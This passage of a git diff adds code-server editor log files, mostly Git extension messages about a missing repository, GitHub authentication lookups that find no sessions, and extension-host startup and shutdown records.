(GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:36:35.032 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:36:35.032 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:36:35.923 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:36:35.923 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:36:58.423 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:36:58.423 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:37:32.555 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:37:32.555 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:37:51.889 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 19:37:51.889 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:38:08.268 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:38:08.268 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:38:41.715 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 19:38:41.715 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:39:15.469 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:39:15.469 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:39:59.249 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:39:59.249 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:40:49.021 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:40:49.021 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:41:21.175 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:41:21.175 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:43:17.306 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:43:17.306 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:43:36.439 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:43:36.439 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:48:17.198 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:48:17.198 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:54:23.306 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 19:54:23.306 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:54:51.639 [info] > git rev-parse --show-toplevel [4ms] +2026-01-26 19:54:51.639 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:55:18.639 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 19:55:18.639 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:56:05.270 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:56:05.270 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 19:56:29.255 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 19:56:29.255 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..30fe4ea --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 19:32:05.284 [info] Reading sessions from keychain... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.284 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.284 [info] Got 0 sessions for ... +2026-01-26 19:32:05.310 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.310 [info] Got 0 sessions for ... +2026-01-26 19:32:05.310 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.310 [info] Got 0 sessions for ... +2026-01-26 19:32:05.310 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.310 [info] Got 0 sessions for ... +2026-01-26 19:32:05.310 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.310 [info] Got 0 sessions for ... +2026-01-26 19:32:05.310 [info] Getting sessions for all scopes... +2026-01-26 19:32:05.310 [info] Got 0 sessions for ... +2026-01-26 19:32:06.983 [info] Getting sessions for all scopes... +2026-01-26 19:32:06.983 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github/GitHub.log new file mode 100755 index 0000000..27d9530 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 19:32:05.642 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteexthost.log new file mode 100755 index 0000000..2f43237 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/remoteexthost.log @@ -0,0 +1,14 @@ +2026-01-26 20:26:23.300 [info] Extension host with pid 9634 started +2026-01-26 20:26:23.308 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-26 20:26:23.520 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 20:26:23.521 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 20:26:23.704 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 20:26:23.752 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 20:26:23.753 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 20:26:23.892 [info] Eager extensions activated +2026-01-26 20:26:23.892 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 20:26:23.893 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 20:26:28.387 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-26 22:43:04.537 [info] Extension host terminating: received terminate message from renderer +2026-01-26 22:43:04.538 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 22:43:04.580 [info] Extension host with pid 9634 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..b0e506c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.git/Git.log @@ -0,0 +1,74 @@ +2026-01-26 20:26:23.933 [info] [main] Log level: Info +2026-01-26 20:26:23.933 [info] [main] Validating found git in: "git" +2026-01-26 20:26:23.933 [info] [main] Using git "2.39.5" from "git" +2026-01-26 20:26:23.933 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 20:26:23.933 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:23.933 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.933 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:23.933 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.934 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:23.934 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.938 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:23.938 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.942 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:23.942 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.947 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:23.947 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.951 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:23.951 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.955 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:23.955 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.986 [info] > git rev-parse --show-toplevel [27ms] +2026-01-26 20:26:23.986 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.994 [info] > git rev-parse --show-toplevel [5ms] +2026-01-26 20:26:23.994 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:23.998 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:23.998 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:24.002 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:24.002 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:24.005 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:24.005 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:24.010 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:24.010 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:24.013 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 20:26:24.199 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:24.199 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:24.203 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:24.203 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:24.321 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:24.321 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:25.168 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 20:26:25.168 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:28.143 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:28.144 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 20:26:28.513 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 20:26:28.513 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:28:51.303 [info] > git rev-parse --show-toplevel [5ms] +2026-01-26 22:28:51.303 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:29:14.331 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:29:14.331 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:33:04.605 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 22:33:04.605 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..8b14944 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 20:26:23.818 [info] Reading sessions from keychain... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.818 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.818 [info] Got 0 sessions for ... +2026-01-26 20:26:23.819 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.819 [info] Got 0 sessions for ... +2026-01-26 20:26:23.844 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.844 [info] Got 0 sessions for ... +2026-01-26 20:26:23.844 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.844 [info] Got 0 sessions for ... +2026-01-26 20:26:23.844 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.844 [info] Got 0 sessions for ... +2026-01-26 20:26:23.844 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.844 [info] Got 0 sessions for ... +2026-01-26 20:26:23.844 [info] Getting sessions for all scopes... +2026-01-26 20:26:23.844 [info] Got 0 sessions for ... +2026-01-26 20:26:25.421 [info] Getting sessions for all scopes... +2026-01-26 20:26:25.421 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..afcdefa --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 20:26:23.997 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteexthost.log new file mode 100755 index 0000000..becfb88 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/remoteexthost.log @@ -0,0 +1,14 @@ +2026-01-26 22:43:07.149 [info] Extension host with pid 34224 started +2026-01-26 22:43:07.152 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-26 22:43:07.310 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 22:43:07.311 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 22:43:07.425 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 22:43:07.451 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 22:43:07.451 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 22:43:07.595 [info] Eager extensions activated +2026-01-26 22:43:07.596 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 22:43:07.596 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 22:43:07.996 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-27 00:13:42.247 [info] Extension host terminating: received terminate message from renderer +2026-01-27 00:13:42.248 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-27 00:13:42.277 [info] Extension host with pid 34224 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.git/Git.log new file mode 100755 index 0000000..72c3c05 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.git/Git.log @@ -0,0 +1,62 @@ +2026-01-26 22:43:07.636 [info] [main] Log level: Info +2026-01-26 22:43:07.636 [info] [main] Validating found git in: "git" +2026-01-26 22:43:07.636 [info] [main] Using git "2.39.5" from "git" +2026-01-26 22:43:07.636 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 22:43:07.636 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 22:43:07.636 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.636 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 22:43:07.636 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.637 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 22:43:07.637 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.646 [info] > git rev-parse --show-toplevel [7ms] +2026-01-26 22:43:07.646 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.651 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.651 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.655 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.655 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.659 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.659 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.664 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.664 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.668 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.669 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.673 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.673 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.677 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.678 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.681 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.681 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.685 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.685 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.689 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.689 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.692 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 22:43:07.698 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.698 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.713 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.713 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:07.717 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 22:43:07.717 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:08.126 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 22:43:08.126 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 22:43:09.828 [info] > git rev-parse --show-toplevel [5ms] +2026-01-26 22:43:09.828 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..b7949a8 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 22:43:07.521 [info] Reading sessions from keychain... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.521 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.521 [info] Got 0 sessions for ... +2026-01-26 22:43:07.522 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.522 [info] Got 0 sessions for ... +2026-01-26 22:43:07.546 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.546 [info] Got 0 sessions for ... +2026-01-26 22:43:07.546 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.546 [info] Got 0 sessions for ... +2026-01-26 22:43:07.546 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.546 [info] Got 0 sessions for ... +2026-01-26 22:43:07.546 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.546 [info] Got 0 sessions for ... +2026-01-26 22:43:07.546 [info] Getting sessions for all scopes... +2026-01-26 22:43:07.546 [info] Got 0 sessions for ... +2026-01-26 22:43:09.868 [info] Getting sessions for all scopes... +2026-01-26 22:43:09.868 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github/GitHub.log new file mode 100755 index 0000000..7d0c0b2 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 22:43:07.834 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteexthost.log new file mode 100755 index 0000000..f938f7f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/remoteexthost.log 